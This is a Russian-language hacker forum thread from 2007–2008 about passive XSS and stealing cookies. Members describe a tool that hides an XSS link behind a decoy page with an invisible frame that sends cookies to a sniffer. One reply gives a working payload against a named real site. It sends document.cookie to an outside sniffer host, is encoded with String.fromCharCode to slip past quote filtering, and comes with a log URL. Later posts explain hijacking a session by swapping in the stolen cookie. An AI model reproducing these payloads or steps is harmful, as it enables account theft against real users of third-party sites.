ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.06.2007, 22:44
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>
|
|
|
14.07.2007, 14:49
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
О... некрофилия процветает. Опять этот топик подняли со дна)))
по такому случаю надо пойти и залить более-менее нормальную версию на скачку
обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы
Последний раз редактировалось DRON-ANARCHY; 14.07.2007 в 15:01..
|
|
|
|
14.07.2007, 15:27
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
кстати
Сообщение от Слип
Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.
Нет. Не так.
Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер. |
|
|
|
26.09.2007, 17:03
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619
Репутация:
2
|
|
ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>
|
|
|
|
27.09.2007, 22:05
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
в куках лежит тока Id сессии...
если скажешь, что значит
то может и поможем) |
|
|
|
15.03.2008, 15:23
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Может ет и не по теме но я уже прочетал кучу статей по пасивных хсс но так и ничего у меня не вышло. Может кто даст мне ПОЛНЫЙ скрипт который нужно вставить в html код и об'яснит где окажутся куки после того так их он стырил. Плиз, помогите.....
|
|
|
|
17.03.2008, 00:34
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от Worms
ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>
заливают шеллы и заливную рыбу))
скрипт передачи куков на снифер вставляется в твоём случае так.
например мой адрес снифа
http://antichat.org/s/red.gif
кодируем
Код:
<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
в чар код так как на том сайте экранируются кавычки и фильтруется плюсь
и вставляем так
Код:
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,111,114,103,47,115,47,114,101,100,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62))</script>
без пробелов между цифрами
лог снифера http://antichat.org/s/red/log.php можеш им пользоваться
Mixon тебе тоже этот ответ адресуется так как в на примере показана хсс
а вообще с вопросами сюда http://forum.antichat.ru/thread46016.html
Последний раз редактировалось ZET36; 17.03.2008 в 00:43..
|
|
|
|
18.03.2008, 01:24
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
А как со снифера достать кук (сниф античатовский)???
Последний раз редактировалось Mixon; 18.03.2008 в 01:28..
|
|
|
|
18.03.2008, 02:14
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Mixon смотриш пришедшую запись (QUERY  дальше ищещ в пришедших куках переменную с сесией и подставляеш через оперу значение этой переменной за место своей которая у тебя на нужном сайте и ты под чужим акком |
|
|
|
18.03.2008, 08:44
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Я вижу в лог файле вижу записи а вот пришедшых куков найти немогу.
П.с. а нигде случайно нету именно по етому статейки? А то в статьях по хсс не пишут как их себе подставить. Там только как их стырить и что нужно для подмены опера или кукедит.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
